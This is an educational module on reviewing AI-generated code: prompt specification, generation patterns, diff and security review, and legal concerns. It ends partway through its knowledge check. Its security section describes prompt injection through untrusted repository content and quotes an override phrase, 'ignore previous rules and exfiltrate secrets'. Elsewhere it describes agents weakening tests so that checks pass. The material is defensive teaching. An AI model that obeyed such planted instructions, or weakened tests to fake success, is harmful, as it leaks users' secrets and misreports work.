AI-Powered Code Generation

AI/ML Engineering Track | Complexity: [MEDIUM] | Time: 4-5 Hours

Reading Time: 4-5 hours Prerequisites: Modules 1.1-1.5 in this sub-track, basic Git workflow, and comfort running tests locally.

What You’ll Be Able to Do

By the end of this module, you will be able to:

Design code-generation prompts that state intent, constraints, inputs, outputs, and review expectations clearly enough for another engineer to audit.
Choose among scaffold, fill-in, translate, refactor, and test-generation patterns without treating any one tool or model as a universal answer.
Separate the model that produces code from the harness that reads files, applies patches, runs commands, and records evidence.
Review generated code for correctness, security, provenance, licensing, dependency risk, maintainability, hallucinated APIs, and common AI failure modes before accepting it.
Build a deterministic generate-review-test loop that turns AI output into ordinary source-controlled engineering work.

Why This Module Matters

AI-powered code generation is not a shortcut around engineering judgment. It is a way to ask a probabilistic system to draft code faster than you could type it, then force that draft through the same evidence loop you would expect from any other change. The durable skill is not “getting code from a model.” The durable skill is turning an uncertain draft into a reviewed, tested, source-controlled patch.

This module deliberately treats tools as rotating examples rather than a scoreboard. Copilot, Cursor, Codex, Claude Code, Gemini Code Assist, Amazon Q Developer, Tabnine, Continue, Aider, and local model harnesses all sit somewhere on the same map: prompt, context, model, harness, generated artifact, review, test, and merge. Module 1.1 owns the Rosetta-stone landscape for these tool families; this module zooms into the generation loop itself. See Module 1.1: AI Coding Tools Landscape when you need the broader tool taxonomy.

Hypothetical scenario: a team asks an assistant to “add CSV import support” to a service. The generated patch adds a parser, a route, a dependency, and tests. The diff looks polished, but the parser accepts arbitrary file paths, the dependency name is one character away from a popular package, and the tests only cover clean input. The failure is not that AI generated code. The failure is that nobody reviewed the generated output as an untrusted draft.

The same pattern appears in smaller tasks. A model can generate a validation function that looks idiomatic but treats None as an empty string. It can update tests by weakening assertions instead of fixing behavior. It can invent a framework method that resembles the real API but does not exist. These are not exotic failures. They are normal consequences of asking a language model to predict useful text from incomplete context.

The engineering response is not fear or blind trust. The response is a disciplined workflow: specify the task, constrain the surface area, generate the smallest useful artifact, inspect the diff, run objective checks, and keep responsibility with the human and the repository. Once you learn that loop, code generation becomes a practical accelerator rather than an invisible source of production risk.

The Mental Model of AI Code Generation

An AI code generator is a text prediction system wrapped in a development harness. The model predicts code, prose, commands, or test cases from the prompt and context it receives. The harness determines what files the model can see, whether it can edit them, whether it can run commands, how patches are applied, and what evidence is shown to the developer. These are independent choices, which is why the same model can feel powerful in one coding tool and clumsy in another.

Keep the distinction sharp. Model quality affects the draft: reasoning depth, code fluency, context use, style matching, and ability to follow constraints. Harness design affects the workflow: file discovery, patch application, command execution, sandboxing, approvals, telemetry, and auditability. A strong model in a weak harness may generate impressive snippets that are hard to apply safely. A modest model in a careful harness may perform well on routine edits because it can read the right files, make a narrow patch, and run the right test.

Prompt + context
      |
      v
Model predicts a draft
      |
      v
Harness applies or presents the draft
      |
      v
Human and repository review the result
      |
      v
Tests, linters, scanners, and diff review produce evidence

The output should begin life in your mind as “plausible, untrusted code.” That phrase is useful because it avoids two bad habits. It prevents dismissal of generated code merely because a model wrote it, and it prevents acceptance of generated code merely because it compiles. Plausible drafts deserve evaluation, not automatic approval.

Token prediction is not the same as understanding your system. A model may infer intent from names, comments, adjacent tests, documentation, and common patterns, but it does not own your business rules. If the repository has a domain invariant such as “refunds cannot exceed captured payment,” “deleted accounts remain auditable,” or “tenant identifiers must never be inferred from user input,” you must supply that invariant or verify that it already appears in the local context.

This is why review is non-negotiable. Generated code is often syntactically clean because public examples contain a lot of syntactically clean code. Security posture, edge-case behavior, licensing fit, dependency health, and compatibility with your own conventions are much less visible from syntax alone. The model can produce code that looks mature while hiding exactly the assumptions that matter.

The mental model also explains why generation is strongest on known patterns. CRUD scaffolds, CLI wrappers, data validators, adapters, serializers, test fixtures, migrations, and documentation usually have recognizable shapes. Novel algorithms, ambiguous product behavior, security-sensitive authorization logic, performance-critical trading paths, and compliance-heavy data flows require much more human ownership because the correct answer depends on context that may not be in the prompt.

Treat every generation request as a small contract. The prompt states the work, the context supplies the facts, the model drafts an answer, the harness makes the draft reviewable, and the repository decides whether it is true. When that contract is explicit, AI code generation fits naturally into professional engineering. When the contract is implicit, the tool invents missing terms on your behalf.

Core Concepts

Specification-Driven Generation

Specification-driven generation means you describe the desired behavior before asking for code. This sounds obvious, but vague prompts are still one of the most common reasons generated code wanders. “Generate a function to process data” gives the model permission to invent input shapes, validation rules, output formats, error behavior, performance expectations, and dependency choices. Those inventions may be reasonable in isolation and wrong for your system.

A useful specification names the artifact, inputs, outputs, constraints, edge cases, allowed dependencies, disallowed behavior, and review evidence. You are not trying to write a novel in the prompt. You are trying to remove the degrees of freedom that would be dangerous for the model to guess. The more the task touches security, money, identity, reliability, or compatibility, the more explicit the specification should be.

Poor specification:

Generate a function to process uploaded files.

Better specification:

Generate a Python function named read_user_upload.

Inputs:
- base_dir: pathlib.Path, already created by the service
- user_filename: str, supplied by an untrusted user

Output:
- str containing UTF-8 text from the selected file

Constraints:
- Resolve paths and reject any path outside base_dir.
- Reject absolute paths and parent-directory traversal.
- Limit file size to 1 MiB before reading.
- Raise ValueError for invalid names and FileNotFoundError for missing files.
- Use only the Python standard library.

Evidence:
- Include pytest tests for valid files, traversal attempts, absolute paths,
  missing files, and oversized files.

Notice the difference. The better prompt does not merely ask for a function; it defines what the function is allowed to assume. It also asks for tests that expose the risk area. If the generated implementation later uses open(user_filename) directly, the review has an obvious rejection criterion because the prompt already declared that filenames are untrusted.

Specification quality is not only about constraints. It is also about preserving design intent. If you ask a model to “modernize” code without stating which public interfaces must remain stable, it may produce a cleaner implementation that breaks downstream callers. A good refactor prompt says which signatures, response shapes, status codes, environment variables, and file formats must not change.

The review discipline begins before generation. Read your own prompt as if it were a ticket assigned to a teammate. If a responsible engineer could interpret it in several incompatible ways, the model will have the same opening. Tighten the prompt until the desired patch can be judged from the diff and the tests, then generate.

Harness and Model Are Separate Choices

Many developers say “the AI did it” when they really mean a model produced output inside a particular tool. That shorthand hides important engineering choices. A browser chat, an editor assistant, a terminal agent, and a CI-connected agent can all call capable models, but they expose different context and authority. The right question is not “which assistant should I use?” It is “which combination of model and harness matches the risk of this generation task?”

For example, a fill-in-the-middle autocomplete harness may be ideal when you are writing a familiar loop inside a file you already understand. The model sees local context and suggests a small continuation. You accept, edit, or reject the suggestion immediately. The blast radius is small because the harness mostly affects the current buffer, even if the underlying model is strong enough for broader reasoning.

A terminal agent harness changes the calculus. It may inspect the repository, edit multiple files, run tests, install packages, and summarize the result. That authority can be valuable for a cross-file refactor, but the review burden increases. You must check which files changed, whether commands were appropriate, whether dependency updates were justified, and whether the evidence actually supports the claim that the task is complete.

As of 2026-06; verify before relying: public documentation for major coding products describes frequent changes in model menus, billing units, plan limits, and agent capabilities. Treat product facts as volatile skin around the durable workflow. A model that is available in an IDE today may be renamed, retired, rate-limited, or moved behind a different plan later, while the review loop stays the same.

This separation also helps when a result is poor. If the assistant missed a file, the harness may have lacked context or search capability. If it saw the right file but invented an API, the model may have overgeneralized from similar libraries. If it produced a good patch but changed too many files, the prompt and harness permissions were too broad. Diagnose the failure at the right layer before switching tools.

The Generate-Review-Test Loop

The durable loop is simple enough to memorize: prompt, generate, review, test, revise. The important part is that review happens before you emotionally accept the patch. If you let a polished diff become “the solution” in your mind before checking it, the rest of the process becomes confirmation bias. You start looking for reasons to keep the patch instead of reasons it might be wrong.

flowchart TD
    A[Write task contract] --> B[Provide scoped context]
    B --> C[Generate smallest useful draft]
    C --> D[Review diff and assumptions]
    D --> E{Reject or revise?}
    E -->|Reject| A
    E -->|Revise| F[Patch manually or refine prompt]
    F --> D
    E -->|Looks plausible| G[Run targeted checks]
    G --> H{Evidence passes?}
    H -->|No| I[Debug with failure output]
    I --> D
    H -->|Yes| J[Security and provenance review]
    J --> K{Ready for normal review?}
    K -->|No| D
    K -->|Yes| L[Commit through ordinary workflow]

Run the loop in small increments. A single generated helper function is easier to review than a generated subsystem. A migration of three named files is easier to verify than “update the API layer.” A generated test suite is easier to trust when you can compare it against a written behavior contract. Small loops are not slower in practice because they reduce the cost of discovering that the model took the wrong path.

The first review pass should be silent and skeptical. Read the diff without the assistant’s explanation. Explanations can be useful later, but they can also anchor you to the model’s story. The diff is the artifact that will run in production. Check whether it changes the files you expected, preserves public contracts, introduces dependencies, alters tests, changes error handling, or quietly removes safeguards.

Only after that should you run the evidence. Tests, linters, type checks, static analysis, dependency scanners, and manual smoke tests each answer different questions. A test can prove a behavior for known cases, but it cannot prove the absence of injection risk. A type checker can prove interface consistency, but it cannot prove business correctness. A security scanner can flag known patterns, but it cannot understand every domain invariant.

Test-Driven Generation

Test-driven generation is one of the safest ways to use AI because it turns vague intent into executable boundaries. Instead of asking the model to produce implementation first, ask for tests from a behavior specification, review those tests, then generate code to pass them. This works because reviewing tests is often easier than reviewing a full implementation. You can ask whether the tests express the behavior you actually want before any implementation bias enters the conversation.

A strong test-generation prompt includes normal cases, boundary cases, invalid inputs, failure modes, and invariants. It also states what not to test. If a function should not call the network, ask for tests that use temporary files or mocks rather than live services. If output order matters, say so. If a legacy bug must remain compatible for now, document that uncomfortable fact in the tests rather than letting the model “fix” it accidentally.

Generate pytest tests for normalize_slug(text: str) -> str.

Behavior:
- Lowercase ASCII letters.
- Replace whitespace and underscores with single hyphens.
- Remove characters outside letters, numbers, and hyphens.
- Collapse repeated hyphens.
- Strip leading and trailing hyphens.
- Raise TypeError for non-string input.

Review requirements:
- Include at least one test for empty input.
- Include at least one test for punctuation-only input.
- Include parametrized tests for common examples.
- Do not change the function signature.

Review the generated tests as carefully as generated implementation. Models sometimes write tests that simply mirror their own planned implementation instead of the specification. They may assert the wrong behavior for edge cases, skip negative tests, or use broad assertions that would pass broken code. If the tests are weak, generating implementation against them only makes the weakness feel official.

Once the tests are reviewed, implementation generation becomes more constrained. The model has executable targets, and you have a concrete way to reject regressions. This does not remove the need for code review, but it reduces the chance that the model optimizes for a pretty happy path while ignoring boundaries. Test-driven generation is especially useful for validators, parsers, formatters, adapters, and compatibility refactors.

Generation Patterns

Pattern 1: Scaffold a Known Shape

Scaffolding asks the model to create a standard project shape, module layout, class skeleton, route handler, command-line interface, or service adapter. It helps when the work is structurally repetitive and the risk lies more in missing pieces than in inventing an algorithm. The goal is not to outsource architecture. The goal is to get a complete first draft of a familiar shape that you can prune and harden.

Good scaffolding prompts name the target framework, file boundaries, public interfaces, dependencies, and forbidden extras. They also ask the assistant to leave placeholders where domain decisions are unknown. That last detail matters. A generated scaffold should not silently invent authentication, billing, retry policy, or data retention behavior just because those concepts often appear near the requested framework.

Illustrative example, not endorsement: an IDE agent can scaffold a FastAPI route, Pydantic models, and tests when you point it at an existing route and ask it to follow local conventions. The harness is useful here because it can inspect nearby files. The review burden is to verify that the generated route uses existing middleware, error shapes, dependency injection patterns, and test fixtures instead of creating a parallel mini-framework.

Generate a scaffold for a read-only Projects API endpoint.

Context:
- Follow the style of src/routes/users.py and tests/test_users.py.
- Use the existing auth dependency; do not create new auth helpers.
- Preserve the existing error response format.

Files allowed:
- src/routes/projects.py
- tests/test_projects.py

Evidence:
- Include tests for authorized request, unauthorized request, and missing project.

Reject scaffolds that look complete in the wrong way. A model that adds a new database session factory, custom logger, alternate validation library, and new exception hierarchy may be demonstrating fluency, but it is also increasing integration cost. A useful scaffold should snap into the system you have, not advertise the system the model wishes you had.

Pattern 2: Fill In a Local Gap

Fill-in generation is the smallest and often safest pattern. You provide a function signature, type definitions, adjacent examples, and a clear behavior contract. The model fills the body or completes a narrow block. This pattern fits autocomplete, inline chat, and manual edit modes because the harness does not need broad authority. The surrounding code already supplies most of the context.

The risk is that local context can hide global constraints. A helper may look correct inside one file while violating a convention enforced elsewhere. For example, a generated serializer might return datetime.isoformat() while the API contract requires a trailing Z, or a generated cache key might omit the tenant identifier because the current file did not show multi-tenant behavior. Local generation still needs domain review.

Illustrative example, not endorsement: a local model harness can be a reasonable fit for filling small pure functions when source-code privacy is the primary constraint. The model may be less capable than a hosted frontier model, but the task may not require deep reasoning. The review standard does not change: read the function, run targeted tests, and check edge cases rather than accepting the output because it stayed local.

Fill in the body of parse_duration(value: str) -> int.

Rules:
- Accept "10s", "5m", "2h", and "1d".
- Return seconds as int.
- Reject negative values.
- Reject unknown units.
- Raise TypeError for non-string input and ValueError for malformed strings.
- Do not import external packages.

Small prompts should still include review instructions. Ask the assistant to mention assumptions after the code, not inside the code. If it says “I assumed days are 24 hours” or “I rejected fractional units,” you have a review handle. If those assumptions are wrong, revise the prompt before the function spreads into callers and tests.

Pattern 3: Translate Between Languages or Frameworks

Translation asks the model to convert behavior from one language, framework, API version, or library to another. This pattern is attractive because models have seen many equivalent idioms. It is also dangerous because surface similarity can hide semantic differences. A JavaScript function that treats missing values loosely may not translate cleanly into a Python function with strict type expectations. A library migration may preserve names while changing default behavior.

The prompt must state whether you want semantic equivalence, idiomatic style, or a deliberate redesign. Those are different tasks. Semantic equivalence preserves behavior even if the result is not elegant. Idiomatic translation may improve style but risks changing edge cases. Redesign uses the original as inspiration rather than a contract. If you do not choose, the model may choose for you.

Illustrative example, not endorsement: a browser chat can help compare two library APIs before an IDE or terminal harness edits the code. The chat layer is useful for planning because it has no write authority. After planning, a harness with file access can perform the narrow migration. This separation keeps exploratory reasoning away from the patch until you have a concrete task contract.

Translate this Express middleware to FastAPI dependency style.

Preserve behavior:
- Missing Authorization header returns HTTP 401.
- Invalid token returns HTTP 403.
- Valid token returns a UserContext object.
- Do not change token validation semantics.

After the translation:
- List any behavior that could not be preserved exactly.
- Generate tests that compare the old and new behavior cases.

Review translated code against behavior, not appearance. The generated code may look idiomatic while changing default timeouts, exception types, serialization rules, transaction boundaries, or error response formats. When translation touches user-visible behavior, golden tests or fixture-based comparisons are often more valuable than line-by-line confidence.

Pattern 4: Refactor Under Constraints

Refactoring with AI is powerful because the assistant can find repetitive patterns and propose a cleaner structure quickly. It is risky because “make this better” is an invitation to alter architecture, public contracts, and tests at the same time. A refactor prompt should sound strict: preserve behavior, name allowed files, state the intended design change, and forbid unrelated cleanup.

Good AI refactors are narrow enough that the diff tells a coherent story. Extract duplicate validation into one helper. Rename a type across a small package. Replace a deprecated API in three files. Split a long function while preserving inputs and outputs. These tasks give the model room to help without granting permission to redesign the system.

Illustrative example, not endorsement: a terminal agent is useful for refactors when it can run the relevant tests after each patch. The harness advantage is the evidence loop, not the mere ability to edit many files. If the terminal agent changes test expectations to make failures disappear, that is not a successful refactor. It is a review failure that should be rejected.

Refactor duplicate email validation into a shared helper.

Allowed files:
- src/users/validation.py
- src/admin/validation.py
- tests/test_user_validation.py

Must preserve:
- Public function names.
- Exception classes.
- Error message strings.
- Existing test behavior.

Do not:
- Add dependencies.
- Reformat unrelated code.
- Change authorization checks.

The review pass for refactors should start with the public contract. Check signatures, response shapes, exception types, error messages, exported names, database migrations, and configuration keys. Then check whether tests were strengthened or weakened. A generated refactor that deletes edge-case tests may look smaller, but it has reduced your evidence.

Pattern 5: Generate Tests and Review the Tests

Test generation is a first-class pattern, not a chore delegated after implementation. Models are often good at enumerating normal cases, obvious boundaries, and simple invalid inputs. They are less reliable at discovering domain-specific invariants unless you state them. A stronger use is to ask for a broad draft, then review and edit the tests until they express your real contract.

Ask for test categories instead of only a target coverage number. Coverage can be gamed with shallow assertions. Categories force useful thinking: happy path, empty input, malformed input, boundary values, permission failures, timeout behavior, duplicate data, concurrency assumptions, and regression cases. If a generated test does not explain what behavior it protects, improve it before trusting it.

Illustrative example, not endorsement: Copilot-style inline completion can be effective when you are writing parameterized tests and the next cases follow a visible pattern. The harness is low authority, so the main review task is checking that each generated case is meaningful. An agentic harness may be better when tests require fixtures across several files, but the diff review burden rises accordingly.

Generate pytest tests for this function.

Focus on behavior, not implementation:
- Valid input with normal values.
- Empty input.
- Boundary values around the maximum size.
- Invalid types.
- Security-sensitive malformed input.
- A regression case for issue #123 if the issue context is present.

Do not:
- Assert private helper calls.
- Mock the function under test.
- Change existing tests to pass the new implementation.

Review generated tests for three anti-patterns. First, tautological tests that reimplement the same logic as the function under test. Second, broad assertions such as “result is not None” when the contract requires a specific value. Third, tests that bless generated behavior you never requested. A test suite can make a wrong assumption durable, so treat generated tests as design artifacts.

Pattern 6: Generate Documentation From Reviewed Code

Documentation generation is useful when the code is already reviewed and stable. Models can summarize parameters, examples, error behavior, and usage patterns quickly. The danger is that documentation can become more confident than the code. If the model invents guarantees, performance properties, compatibility promises, or security claims, the docs become a source of future bugs.

Ask documentation prompts to cite the code locations they are summarizing and to mark uncertainty. For public docs, require examples that actually run. For internal docs, require operational caveats such as configuration, failure modes, and test commands. Documentation generated from unreviewed code should be labeled as draft because it may simply explain a bug elegantly.

Illustrative example, not endorsement: a chat tool with read-only repository context is often enough for documentation drafting. You do not need a write-capable agent to explain a stable API. Keeping the harness read-only can be a deliberate safety choice when the task is understanding and prose rather than code modification.

Draft documentation for the reviewed parse_duration function.

Include:
- Purpose.
- Accepted input format.
- Return value.
- Exceptions.
- Three executable examples.
- One warning about unsupported fractional units.

Do not:
- Claim performance guarantees.
- Mention units not supported by the code.
- Describe future behavior as current behavior.

The review discipline for generated documentation is factual verification. Run examples, compare each claim to code, remove marketing language, and avoid implying support for cases that are not tested. Documentation is part of the product surface. Generated prose can mislead users just as generated code can mislead maintainers.

Reviewing Generated Output

Reviewing generated output is the core skill of this module. The review should be structured because unstructured review tends to follow whatever the assistant emphasized. A generated summary might say “added validation and tests,” but your review needs to ask which validation, which tests, which files, which dependencies, and which assumptions changed. The assistant’s summary is a starting point, not evidence.

Begin with scope. Run git status --short and inspect the file list before reading individual lines. Generated code sometimes touches formatting, lockfiles, generated artifacts, unrelated tests, or configuration because the harness had broad write access. If the file list is wrong, stop there. A beautiful implementation in the wrong files is still the wrong patch.

Then inspect the diff for contract changes. Public APIs, schemas, response formats, error messages, database queries, permissions, environment variables, and configuration defaults deserve special attention. Models often “simplify” awkward compatibility behavior because they do not know who depends on it. If compatibility matters, the prompt should have said so, but the review must catch it regardless.

Correctness review asks whether the code implements the intended behavior for normal, boundary, and invalid cases. Read conditionals carefully. Check off-by-one logic, empty collections, missing keys, time zones, Unicode handling, concurrency assumptions, integer overflow in languages where it matters, and resource cleanup. Models frequently produce code that handles the central example and neglects the edges around it.

Security review asks whether generated code accepts untrusted input, builds queries, shells out, reads files, writes files, parses archives, handles secrets, changes permissions, or adds dependencies. These are review hotspots. A generated function that only formats a string may need light review. A generated function that processes user-supplied file paths needs path normalization, base-directory enforcement, size limits, and tests for traversal attempts.

Provenance review asks where the code and dependencies came from. Generated code may be generic enough to be ordinary, but exact-looking snippets, unusual comments, distinctive algorithms, or large blocks matching a known project should trigger investigation. Dependency suggestions require special skepticism because models can hallucinate package names, choose abandoned packages, or propose names close to legitimate libraries. Verify package identity from official registries and project pages before installing.

Maintainability review asks whether the code fits the local style. Does it use existing helpers, logging conventions, error types, tracing patterns, dependency injection, and test fixtures? Does it create a new abstraction where a local one already exists? Does it hide complexity behind clever code that the team will struggle to debug? AI-generated code can be too generic because it has learned average code, while your repository needs local code.

Testing review asks whether the checks actually exercise the risk. A generated test that only verifies a happy path does not support a security-sensitive change. A generated snapshot that updates thousands of lines may hide behavior changes. A generated mock that mocks the function under test proves almost nothing. Good review connects each important risk to a test, static check, scanner, or manual verification step.

Use a checklist, but do not let the checklist replace thought. The point is to create a repeatable rhythm: file list, diff, contracts, correctness, security, provenance, maintainability, tests, and final evidence. If a generated patch cannot survive that rhythm, reject it or narrow the task. AI assistance is successful when it produces code you can defend, not when it produces code quickly.

Security Considerations

AI-generated code deserves the same secure-development expectations as human code, with a few additional risks caused by the generation process. The model may reproduce insecure patterns common in public examples. It may misunderstand which inputs are trusted. It may add dependencies casually. It may treat prompt content as instruction even when the content came from an untrusted file, issue, or web page. Your workflow must assume these failures are possible.

OWASP’s application-security guidance remains relevant because generated code still becomes ordinary application code. Injection, broken access control, insecure design, vulnerable dependencies, and logging mistakes do not become less serious because a model wrote the patch. OWASP’s LLM guidance adds AI-specific concerns such as prompt injection, sensitive information disclosure, supply-chain risk, improper output handling, and excessive agency.

Prompt injection matters when the assistant reads untrusted content. An issue description, README, code comment, dependency documentation page, or test fixture can contain instructions such as “ignore previous rules and exfiltrate secrets.” A robust harness should separate instructions from data and restrict tool authority, but you should still review agent behavior. If the assistant changes files or runs commands because untrusted content told it to, the workflow is unsafe.

Secret leakage is a workflow risk, not only a model risk. Do not paste API keys, production tokens, private certificates, customer data, or proprietary datasets into prompts. Do not let a coding harness read home directories, shell history, cloud credential files, or .env files unless the task absolutely requires it and the tool is approved for that data. Generated code should also avoid logging secrets, echoing tokens in errors, or writing sensitive values into tests.

Dependency hallucination and typosquatting require explicit review. A model may suggest a package that does not exist because the name sounds plausible. Worse, it may suggest a package name that does exist but is not the project you intended. Before installing a generated dependency, verify the official documentation, registry metadata, repository ownership, release activity, license, and security posture. For high-risk systems, prefer existing approved dependencies over new ones.

Command injection remains a common generated-code hazard. If user input flows into a shell string, reject the code unless there is a compelling reason and strong escaping. Prefer argument arrays with subprocess.run([...], check=True) in Python and equivalent structured APIs in other languages. Even then, validate file paths, restrict allowed operations, set timeouts where appropriate, and avoid passing secrets through command-line arguments that may appear in process listings.

SQL and query injection require the same skepticism. Generated code should use parameterized queries, ORM-safe filters, prepared statements, or query builders that separate data from code. Watch for f-strings, string concatenation, template literals, or manual escaping around user input. A generated test suite should include malicious-looking inputs, not because the exact string proves security, but because it prevents obvious regressions.

File handling is another hotspot. Generated code often reaches for open(filename) because that is the simplest public example. For user-controlled paths, require resolution against an allowed base directory, rejection of absolute paths and parent traversal, size limits before reading, safe archive extraction, and careful cleanup of temporary files. Tests should include traversal attempts and oversized inputs, not only valid files.

License and provenance concerns are durable even as vendor policies change. Generated code becomes part of your repository, so your team remains responsible for whether it is compatible with your license obligations. Some tools offer public-code matching or indemnity features under certain plans, but those product details are volatile and not a substitute for review. Treat unusual or lengthy generated snippets as material that may need provenance checking.

Security review should happen before merge, not after production feedback. A practical minimum is to inspect the diff manually, run the relevant unit tests, run the project’s static checks, scan dependency changes, and require human approval for security-sensitive code. For generated changes that touch authentication, authorization, cryptography, payment, personal data, deployment, or secrets, use a higher bar and involve the appropriate reviewer.

Advanced Techniques and Workflows

Advanced code generation is less about longer prompts and more about better decomposition. Large tasks fail when the model tries to solve architecture, implementation, tests, migration, and documentation in one pass. Decompose the work into phases that each produce a reviewable artifact. A plan can be reviewed before code exists. Tests can be reviewed before implementation. A migration can be split by module. Documentation can wait until behavior is stable.

One useful workflow is plan-first generation. Ask the assistant to inspect context and propose a file-scoped plan without editing. Review the plan for scope, missing risks, invented dependencies, and test strategy. Only then allow a patch. This is especially useful with agentic harnesses because it gives you a chance to catch overreach before the tool modifies files.

Before editing, inspect the repository and propose a plan.

Your plan must include:
- Files you intend to read.
- Files you intend to change.
- Behavior that must remain stable.
- Tests or checks you will run.
- Risks you see in the task.

Do not edit files until the plan is approved.

Another workflow is critique-first generation. Use one assistant or mode to draft code and another read-only pass to critique it. The critique should focus on concrete risks: edge cases, security, dependency changes, test gaps, and local convention mismatches. Do not ask for a vague “review.” Ask for findings grounded in file paths and behavior. Then verify the critique yourself because reviewers can hallucinate too.

CI-embedded generation is powerful but dangerous. A workflow that opens automated pull requests for dependency updates, API migrations, or test repairs can save time, but it must not merge itself. The generated PR should include the prompt or task contract, the diff, the checks it ran, and any known limitations. Human review remains the authority boundary. CI is a place to produce evidence, not to hide authorship.

Multi-step agent workflows should preserve state through artifacts rather than memory alone. Ask the assistant to write a short plan, update a checklist, and summarize decisions in the PR or task notes. This gives future reviewers something stable to inspect. It also helps when the model context resets or a different tool continues the work. The artifact should be factual and concise, not a transcript of every token.

For local-versus-frontier model tradeoffs, choose based on task risk and data boundary. A local model can be attractive for private code, predictable cost, and low-latency completions, but it may struggle with complex reasoning or large migrations. A frontier hosted model may produce better plans and patches, but it requires data-policy approval and cost controls. The harness should make either choice reviewable through the same diff and test loop.

Determinism is limited because generation is probabilistic, but the workflow can still be deterministic. Pin dependencies, write tests, record commands, keep prompts in PR descriptions when appropriate, and avoid relying on generated output that cannot be reproduced or reviewed. You do not need the model to produce the same text twice. You need the repository to prove that the accepted patch behaves correctly.

Finally, use manual edits without apology. A common beginner mistake is to keep prompting for a perfect patch when a two-line human edit would finish the job. AI generation is a drafting tool, not a ritual. If review reveals a small issue, fix it directly, run the checks, and move on. The standard is maintainable code with evidence, not maximal model involvement.

Did You Know?

Dated snapshot, model menus: As of 2026-06; verify before relying, GitHub Copilot documentation lists multiple model providers and release statuses, while warning that model availability can change over time.
Dated snapshot, hosted agents: As of 2026-06; verify before relying, OpenAI describes Codex as a coding agent available through local and cloud-oriented workflows, with development environments and tests treated as important context for agent performance.
Dated snapshot, editor modes: As of 2026-06; verify before relying, Cursor documentation describes modes with different tool authority, including read-only exploration, direct edits, and agentic workflows that can use broader tools.
Security framing: OWASP’s LLM guidance treats prompt injection and improper output handling as application risks, which maps directly onto generated-code workflows that read untrusted text and turn model output into executable code.

Common Mistakes and Pitfalls

AI code generation fails in predictable ways. The mistakes below are not reasons to avoid the tools; they are review prompts. If you can name the failure mode, you can design the prompt, harness permissions, tests, and review checklist to catch it before it becomes a merged change.

Mistake	Why It Happens	Better Approach
Trusting generated code blindly	The output is syntactically polished, so reviewers mistake fluency for correctness.	Treat every generated patch as plausible, untrusted code until diff review and tests support it.
Asking for broad rewrites	Vague goals such as “modernize this” let the model invent architecture and compatibility changes.	State allowed files, stable contracts, forbidden changes, and evidence before generation begins.
Reviewing only the implementation	Generated tests can be weak, tautological, or aligned to the model’s mistaken assumptions.	Review tests as design artifacts, then run them against the intended behavior and risk cases.
Ignoring harness authority	Developers blame the model for failures caused by missing context or excessive write permissions.	Separate model capability from harness scope, command authority, file access, and approval mode.
Accepting new dependencies casually	Models suggest plausible package names and popular patterns without checking supply-chain risk.	Verify package identity, maintenance, license, registry source, and need before installation.
Skipping security constraints	Public examples often show the shortest path, not the safest handling of untrusted input.	Put validation, parameterization, path safety, secret handling, and abuse cases into the prompt and tests.
Letting agents weaken evidence	A tool may edit tests, snapshots, or config to make checks pass instead of fixing behavior.	Inspect test diffs first, reject weakened assertions, and require checks that match the original task.
Treating product claims as stable	Model names, quotas, prices, and features change faster than engineering principles.	Date volatile facts, cite official docs, and base durable workflow decisions on authority and evidence.

The most damaging version of blind trust is accepting code because the assistant also explained it confidently. Explanations are generated artifacts too. They may describe code that the assistant intended to write rather than code that actually landed in the diff. Always inspect the patch itself before relying on the narrative around it.

Overbroad prompting is especially tempting during refactors. A model can produce a large diff that appears productive, and the size of the patch can create social pressure to keep it. Resist that pressure. If the task was to extract one helper and the patch also changes logging, error messages, dependencies, and formatting, the correct response is usually to narrow the prompt and regenerate or manually recover the useful part.

Dependency mistakes deserve a higher level of suspicion because they extend the blast radius beyond your code. A generated package suggestion can introduce licensing obligations, abandoned maintenance, malicious typosquatting, native build failures, or transitive vulnerabilities. Even when the dependency is legitimate, it may be unnecessary if the standard library or an existing project dependency already solves the problem.

Test weakening is subtle. A generated patch may replace exact assertions with truthiness checks, update snapshots without explanation, remove edge cases that fail, or mock away the behavior under test. These changes can make CI green while reducing confidence. When reviewing generated code, read test diffs before implementation diffs if the assistant claims that tests were updated.

Context flooding is the opposite mistake from under-specification. Pasting thousands of unrelated lines can dilute attention and increase hallucination. Provide the target function, direct dependencies, relevant types, nearby examples, and the behavior contract. If the task requires broader repository knowledge, use a harness that can search deliberately rather than dumping the entire codebase into a prompt.

Finally, do not confuse local generation with safe generation. Running a model locally can help with data-boundary concerns, but it does not automatically prevent insecure code, license issues, or wrong business logic. Local versus hosted is a deployment choice. Review remains the quality boundary.

Legal and Ethical Constraints

Generated code does not remove authorship responsibility from the team that commits it. If the code lands in your repository, your project owns the maintenance burden, security consequences, and license compatibility questions. Vendor features may help detect public-code matches or provide enterprise protections under certain terms, but those features vary by product and plan. They should supplement, not replace, ordinary legal and engineering review.

The most practical legal rule is to be cautious with large or distinctive generated blocks. A short implementation of a standard algorithm is usually less concerning than a long block with unusual structure, comments, names, or formatting that looks copied from a specific project. If the output appears distinctive, search for matches, ask for a different implementation, or write the code manually from the idea rather than accepting the exact text.

Ethical use also includes disclosure and review norms. Teams should decide when AI assistance needs to be mentioned in pull requests, how prompts or task contracts are recorded, and which categories of work require heightened review. A tiny generated docstring may not need special process. An AI-generated authentication change should be obvious to reviewers and backed by tests, threat-model notes, and security review.

Data use policies matter because prompts can contain source code, customer examples, logs, stack traces, and internal architecture. Before using hosted generation on private repositories, verify organizational policy and tool settings. Some products offer enterprise controls, content exclusion, audit logs, or data-use settings, but the exact terms are volatile. The durable practice is to know what data leaves the machine and who is allowed to process it.

There is also an ethical review issue around accountability. A generated patch can shift blame psychologically: “the model wrote it” sounds different from “we merged it.” Production systems do not care. Users experience the behavior your team ships. Keep accountability with the human process, and use AI assistance only where the team can review, test, and maintain the result.

Knowledge Check

Question 1: A developer asks an assistant to "write a login function" and receives code that concatenates user input into a SQL string. What failed: the model, the prompt, the harness, or the review?

Several layers failed, but the review failure is the decisive one. The prompt failed to state security constraints such as parameterized queries, password hashing, rate limiting, and logging. The model produced a common insecure pattern. The harness may have made the code easy to apply. The reviewer still had the final chance to reject generated code that put untrusted input into executable SQL.

Question 2: An IDE assistant generates a clean refactor that changes public error messages and updates snapshots to match. The test suite passes. Why is this still risky?

The passing tests may now reflect the assistant’s changed behavior rather than the original contract. Public error messages can be part of an API if clients, documentation, or support workflows depend on them. A correct review would inspect test diffs, check whether snapshots were updated intentionally, and require explicit approval for any user-visible compatibility change.

Question 3: A local model produces worse code than a hosted model for a cross-file migration, but the team still chooses the local setup for some tasks. When is that reasonable?

